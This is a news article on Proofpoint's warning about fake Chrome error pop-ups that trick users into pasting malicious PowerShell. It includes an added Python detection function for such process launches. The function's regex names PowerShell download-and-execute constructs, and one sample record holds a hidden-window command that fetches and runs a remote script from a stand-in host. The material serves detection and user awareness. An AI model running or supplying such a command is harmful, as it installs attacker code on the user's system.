A technically complicated warning for Google Chrome users has just been issued, but luckily it’s a warning with a stupidly simple instruction to follow to avoid being attacked.
The warning comes courtesy of Proofpoint, which says it has “noticed an increase in a technique that leverages unique social engineering that directs users to copy and paste malicious PowerShell scripts to infect their computers with malware.”
The research team says that multiple threat actors have used the technique, delivering various forms of malware in the process. It is easy to spot, however, so once users know what to look for they will find it very easy to prevent an infection. These are instructions you should be following anyway.
When using Chrome, a user will see a pop-up text box “indicating that an error occurred while trying to open the document or web page”. The popup provides instructions for copying and pasting text into either a PowerShell terminal or the Windows Run dialog.
On the surface, one might assume that this would be easy to recognize as unusual and ignore. But Proofpoint cautions that “although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk.”
The attack itself exhibits the evasive behavior you would expect these days: before downloading and installing malware, it checks whether the device is a virtual machine or a sandbox, making analysis and detection less likely. If everything comes back clean, it installs the malware in the background.
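As an added illustration that is not from the article or Proofpoint's report, the following Python triage function flags the process pattern this lure produces in endpoint telemetry: PowerShell started from explorer.exe (what a paste into the Run dialog produces) with a command line that downloads or evaluates remote content. Field names follow Sysmon Event ID 1, the indicator list is the example author's own choice, and the sample records are constructed.

```python
import re

# Generic PowerShell download/execute constructs, chosen for this example;
# the article itself does not list specific commands.
DOWNLOAD_EXEC = re.compile(
    r"(invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod|net\.webclient|"
    r"downloadstring|invoke-expression|\biex\b|-enc\w*|-e\s+[a-z0-9+/=]{20,})",
    re.IGNORECASE,
)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+h(idden)?", re.IGNORECASE)
POWERSHELL = ("powershell.exe", "pwsh.exe")


def score_event(ev):
    """Return the reasons a process-creation record looks like the lure.
    An empty list means nothing suspicious was found."""
    image = ev.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("CommandLine", "")
    reasons = []
    if image not in POWERSHELL:
        return reasons
    # Win+R (the Run dialog) is serviced by explorer.exe, so a user pasting a
    # command there yields explorer.exe -> powershell.exe rather than a
    # scheduled task, installer or admin tool as the parent.
    if parent == "explorer.exe":
        reasons.append("powershell launched from explorer.exe (Run dialog)")
    if DOWNLOAD_EXEC.search(cmd):
        reasons.append("command line downloads or evaluates remote content")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window requested")
    return reasons


def triage(events):
    """Keep only records with at least two reasons, paired with those reasons."""
    return [(ev, r) for ev in events if len(r := score_event(ev)) >= 2]


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/fix.ps1)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(ev["CommandLine"], "->", "; ".join(reasons))
```

Requiring two reasons keeps a legitimate admin who opens PowerShell from the desktop from tripping the rule on parent process alone.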
Proofpoint attributes the attack to the spam actor TA571, which specializes in “high-volume spam email campaigns to deliver and install a variety of malware for their cybercriminal clients,” and to ClearFake, which emerged last year as “new to the ‘fake update’ threat landscape.”
Much of the malware installed appears to focus on stealing credentials and on enabling fraudulent crypto transactions on devices whose users make their own crypto transfers.
Fake news attacks are becoming more and more common, and we have seen many cases of Google Chrome being the front end of choice for them. With over 3 billion users across all platforms, this is no surprise, but it makes it doubly important that Chrome users are extra careful about updates and add-ons. Chrome provides clear instructions for manual and automatic updates.
In general, the threat landscape has worsened in recent months, and dangerous installers and add-ons from third-party websites, as well as malicious pop-ups like the one seen here, have become an ugly trend.
As Proofpoint warns, this latest attack “aligns with the overall trend Proofpoint has observed of cyber threat actors adopting new, varied and increasingly creative attack chains.”
Fortunately, such attacks should be easy to detect and avoid.
Here are three simple rules:
- Stick to official app stores—don’t use third-party stores and never change your device’s security settings to allow apps to be loaded from elsewhere.
- Never click links in emails or messages that directly download apps or updates—always use app stores or the apps themselves for installations and updates.
- Don’t install apps, add-ons, or updates bundled with established apps like Chrome unless you know with absolute certainty that they’re legitimate—check reviews and online registrations.